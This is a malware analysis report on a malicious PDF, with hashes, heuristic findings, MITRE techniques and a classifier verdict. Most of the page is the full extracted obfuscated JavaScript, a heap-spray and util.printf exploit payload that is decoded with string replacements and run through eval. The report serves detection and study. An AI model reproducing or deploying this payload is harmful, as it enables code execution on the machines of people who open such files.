PDF malware analysis — malicious · 93d159aa1289071f

MALICIOUS

PDF

4.3 KB Created: 2008-09-07 22:47:39 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08

MD5: 4b973fd99de043edbc645753bde87e8d SHA-1: ce733f5154d3ed9fba5c19c35467599c84f4b83e SHA-256: 93d159aa1289071f25784c8ae7b05a9bffb09179da3984d42bb6efac4437824c

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1059.007 JavaScript

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for obfuscating malicious JavaScript. The extracted JavaScript artifact, javascript_obj0013_001.js, is flagged for script obfuscation. The eval() call within the JavaScript is likely used to decode and execute a secondary payload, which is a common delivery mechanism for malware. No specific family could be identified due to the obfuscation.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 4

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
H='f",n';R='Zm);';I='5000';A+=I+H+R;
;A=A.replace(/@/g,'8');A=A.replace(/!/g,'p');A=A.replace(/#/g,'%');A=A.replace(/Z/g,'u');eval(A);
```
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0013_001.js`	pdf-javascript-stream	PDF /JS object 13 at offset 0x37A	6022 bytes
SHA-256: `473f4c1e6a36d6bf566618096ad0e87dcd4cf5faefb90c06b4992d1492782c68`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script A='';I='nes';M='e@#Z';W='#Z3d';T='Z00';S='c5@';H='1@b#Z';Q='b0#Z';F='0000';C='d00#Z';O='3#Z';Z='4530';X='#Z450';Y='b91';B='#Z5';G='ca!';U='ayloa';P='var !';R='d = Z';E='e("#';N='0#Z75';V='4#Z0';L='0000';A+=P+U+R+I+G+E+T+M+F+B+C+S+O+Y+V+H+L+W+Q+Z+X+N; T='962#Z';R='dad';X='Z3dc1';K='49#Z';N='d3d';G='17d#';J='#Zad0';S='Zada';E='3d#';B='31#Z3';Q='d#Zd';C='Zb6';D='4ad#';F='d#Z45';H='ad#';Y='#Z3';Z='0#Za';M='0d9c#';P='Z3d3';O='#Zad';I='ebf9';W='#Z5';A+=K+I+J+Z+R+O+H+S+Q+D+X+Y+N+W+T+M+P+F+E+C+B+G; H='Z55';O='Z3d3d';V='957#';S='635#';L='b6#Zd';U='#Z3';F='Zd56';Y='#Zc4';E='97d';R='021#';Z='Z4d';D='Zb6';Q='34#Z0';X='641';N='0#Zb';K='cab6';G='#Z01';P='b6#Z9';B='55#Z';I='4#Z';M='#Z7db';T='3db2#';A+=Z+P+R+H+L+S+D+Q+E+M+N+X+G+B+K+U+V+F+I+T+O+Y; U='3d53#';B='d3d';V='4@#';W='Z5051';Z='#Zc2';G='69#';J='b6#Zb';C='02#';T='#Z3d';K='525';R='d7a';X='Z553d';M='5#Z';N='df#Z';O='#Zea';I='#Z4f';F='#Z3d';L='2b#';D='44#Z3';P='Zd5d5';Q='Zc74';E='Zb6';A+=N+K+M+U+X+I+V+W+Z+G+E+L+P+F+D+B+O+J+R+T+C+Q; Q='#Z6';G='@#Z6';N='63d';Z='bcf4';B='a#Z3';C='ce1#Z';R='6e6f';E='Zd2';M='d1#Z';V='#Z3';X='bd7';S='#Z39';F='c#Zb';T='62#Z';O='c74@#';W='b6#';K='3d3';J='955';P='d02#Z';L='#Z3d3';Y='Z0e';U='a7a#Z';A+=G+U+X+B+P+O+E+W+Y+T+Z+S+M+K+F+N+Q+C+R+V+J+L; F='d#Z4';J='3#Z';M='c23';L='bcc7';W='06b';D='5@1';B='4@#Z';Y='6c#';U='c#Z';R='Z3e';K='46#Z';N='5@45#';Q='#Zc1';S='@3d#Z';C='Z3fb6';G='b#Z64';X='d#Z';P='Z6f';T='316';V='#Z7e6';Z='e#Z';E='67#';A+=U+M+X+T+G+E+P+Y+C+V+Z+W+F+S+L+Q+K+D+J+N+R+B; E='b766#';C='5@4';S='6d6d#';I='7e#Z5';X='e#Z';R='fb#Z3';B='e#Zc2';L='Z3d7@';Q='Z6a6';T='#Z39';U='Z39';Y='@13#Z';N='d35#Z';W='6d#Z2';G='fc#Z';J='fa3e';M='d6be';K='#Zfd0';Z='#Zb4';H='35#Z';O='5#Z7e';D='b50d#';A+=M+Z+H+J+T+I+Y+C+O+R+N+E+U+G+D+L+K+X+S+Q+B+W; S='d6b#Z';J='e64#Z';D='c2#';G='Z01';X='4@#Z4';U='9#Zb';L='Z4@3d';K='b#Z';W='2#Z6c';I='#Z573';H='#Z6b';F='6e3c';E='b66b#';V='39ff#';Y='7c#Z';N='3d07#';C='Z673';R='c5be#';O='#Z6bc';P='Z@94@';B='Zbd';M='35#Z';A+=S+R+L+I+K+F+H+D+C+U+J+V+B+Y+N+P+O+W+M+E+G+X; L='Z0e';M='9b6#Z';Q='Zf4';C='#Zf';T='Z1d4';H='Z2d';O='0e#Z';J='e#Zb6';D='b#Zc';V='2e6#';I='b07#';X='6fc#';N='@3e#';R='@3#Ze';Z='4513#';W='Zc@3';E='Z3e';G='6b#';F='90#';K='7c74#';B='f@#Z3';S='Z3549';A+=M+Z+W+J+G+T+D+N+Q+O+K+E+F+L+B+V+H+R+I+S+C+X; M='3b6#';F='e03';T='Z196';R='6#Z';L='Zccd';P='e#Zb6';U='21#Zb';Q='6e0#';G='3#Z';B='b663#';K='Z3e30';I='#Z7d';Y='7631';D='#Zd';V='5b#Z';W='e7#';H='39#';S='Zb6';E='a4@#Z';C='Z3e';O='#Z6';J='2206';A+=K+I+W+L+R+J+D+E+B+T+G+F+P+V+Y+O+M+C+U+Q+S+H; G='Zb7c';Z='b3c';P='Zf@';S='3e#Z';F='#Zc';V='337';D='0e4';U='fe64';L='6#Z';H='639';J='a5d1#';K='2#Z';R='333#';I='e#Z';E='3#Z';O='2d5';M='b7f';X='e5#Z';T='2c3#Z';N='3#Z4';Y='#Zc';W='Zdf';A+=P+S+H+L+U+Y+O+F+T+Z+K+V+E+J+G+N+R+W+X+D+I+M; C='@12#';J='Z6c7';B='7#Z';D='66#Z';K='90e#Z';P='0b#';V='Z0f13';L='4d#';N='Z1305';H='3d4e#';G='Z4a';F='#Z501';R='9#Z12';Z='#Z0';Y='1227#';I='5#Z';W='4d4';S='0413';U='Z495';O='7#Z0b';X='07#Z0';T='#Z0@';A+=O+D+Y+G+L+J+B+H+U+I+W+R+X+C+N+T+P+V+Z+K+S+F; C='#Z13';M='#Z0d0';E='5c#Z5';P='5b#Z';V='Z5@';K='0b#Z';B='Z550';J='#Z1';I='#Z5f0';U='2#Z';D='2#Z';N='a3d#Z';G='d#Z0d';Q='0400';L='4954';Z='0254#';O='0c0d';T='Z0405';R='959#';W='0d0a';H='252#';S='f#Z0';A+=D+L+J+H+B+U+Q+C+E+N+Z+T+I+S+R+V+K+O+M+G+P+W; V='Z0d0d';U='#Z0d0';G='e0b#';D='0b0d#';O='#Z0d';R='9#Z0';J='Z0e04';Q='d0d#Z';L='@#Z0';W='d#Z0';K='0f0';X='0d0';C='#Z5c0';H='Z5c5';Y='c0e#';B='c5e#Z';Z='d#Z0d';S='Z5c04';N='#Z0f';E='0d#Z0';I='4#Z';T='0d#';A+=N+T+H+R+G+S+C+I+D+V+U+Z+E+Q+K+W+B+X+L+Y+J+O; C='0d0d';S='@;iCn';E='for';P='d0d#';Y='0d#Z0';M='Z0d0d';R='0d#Z';X='c#Z';T='0c0d#';H='var n';G='3d0';O='Z0a0';I='t=12';Q='Z09';J='#Z0d';N='40d#';V=' (iCn';W='0d#Z';F='#Z0';B='d");';L='o! ';U='="";';A+=R+T+Q+Y+N+M+J+W+C+F+P+O+X+G+B+H+L+U+E+V+I+S; H='k = ';D='loc';X='nt) ';C='t>=0;';W='090#';K=' Zn';V='90#Z9';B='#Z909';Q='no!';T='no! +';R='esc';L=' !ayl';I='Z90';J='oad;b';P='0");h';O='ea!b';U='--iC';F='090#';M=' +=';Z='Z909';E='0#Z9';G='a!e("';A+=C+U+X+Q+M+K+R+G+B+E+F+I+V+W+Z+P+O+D+H+T+L+J; R='s!r';H='der';B='bloc';S=' = ';Y='igbl';C='090"';N='+hea!';Q='eng';T='k.l';J='= hea';W='size';O='Z90';G='20;';V=' Znes';K='ock =';X='der';P='("#';U='90#Z9';Z='size';E=');hea';L='ca!e';M='ay ';A+=Y+K+V+L+P+O+U+C+E+H+Z+S+G+R+M+J+X+W+N+B+T+Q; Y='bigb';S='gth<';J='llbl';X='th;';U='while';T=' (b';G='y) b';H='igbl';F='ock ';Q='k;fi';D='gbloc';B='ing(';E='bstr';W='s!ra';V='loc';N='ock+=';K='= bi';C='.len';M='k.sZ';P='ock';I='igbl';L='0, ';A+=X+U+T+I+P+C+S+W+G+H+N+Y+V+Q+J+F+K+D+M+E+B+L; E='ock';X='th+';G=' 0x';L='s!ray';N='th-s!';W='ay <';J='lock ';P='igbl';C='e(b';B='.leng';Q='ray);';D='lock';I=');b';S='block';T='s!r';K='whil';O='4000';Z='.sZbs';V='tring';F='= big';H='.leng';U='(0, b';A+=L+I+J+F+S+Z+V+U+P+E+H+N+Q+K+C+D+B+X+T+W+G+O; E='i=0';L='();fo';G=';i<14';I='lock';Z=' bloc';C='m[i] ';X='r (';K='llbl';H='0) b';F='+fi';N='00;';T='w A';J='ock';B='loc';U='rray';M=';me';D='k =';O='i++';P=' ne';W='k+b';V=') me';Q='m =';A+=H+B+D+Z+W+I+F+K+J+M+Q+P+T+U+L+X+E+G+N+O+V+C; D='var';Y='@@@@@';P='99999';G='lock ';H='@@@';C='9999';Z='+ hea';O='m = 1';M='= b';R='!bl';K='@@@@@';W='999';I='9@@@';U='999';E=' nZ';T='ock;';S='@@@@';N='@@@@';B='299';L='@@@@';X='@@@@@';F='@@@@@';A+=M+G+Z+R+T+D+E+O+B+P+W+C+U+I+X+H+N+F+K+Y+S+L; Y='@@@@';F='@@@';G='@@@@@';R='@@@@';X='@@@@';O='@@@';H='@@@@';V='@@@';T='@@@@@';S='@@@';P='@@@@';D='@@@';B='@@@';W='@@@';L='@@@';N='@@@@@';E='@@@@';U='@@@@';C='@@@@';Z='@@@@@';I='@@@@@';J='@@@';A+=X+G+R+Z+T+Y+W+V+L+D+P+F+S+N+I+U+E+J+B+H+C+O; C='@@@';V='@@@';G='@@@';Q='@@@@';M='@@@';H='@@@@';X='@@@@@';I='@@@';L='@@@@';W='@@@@@';N='@@@@';B='@@@@@';T='@@@';O='@@@';E='@@@@';Z='@@@@@';D='@@@@@';R='@@@@@';P='@@@@';U='@@@@@';S='@@@';F='@@@@@';A+=B+E+N+T+R+F+V+G+H+M+C+Q+Z+S+X+D+U+W+I+O+L+P; Q='@@@';N='@@@';G='@@@';E='@@@@';S='@@@';O='l.!r';F='int';B='@@@@@';Z='Zti';W='@@@';I='@@@';U='@@@';M='@@@@';P='@@@';R='@@@@;';X='@@@@@';K='@@@';H='f("#4';D='@@@';V='@@@@@';J='@@@@';L='@@@@@';A+=G+E+P+L+D+X+Q+B+W+S+K+V+N+M+U+I+J+R+Z+O+F+H; H='f",n';R='Zm);';I='5000';A+=I+H+R; ;A=A.replace(/@/g,'8');A=A.replace(/!/g,'p');A=A.replace(/#/g,'%');A=A.replace(/Z/g,'u');eval(A);

Open this report in the interactive analyzer, or submit your own file for analysis.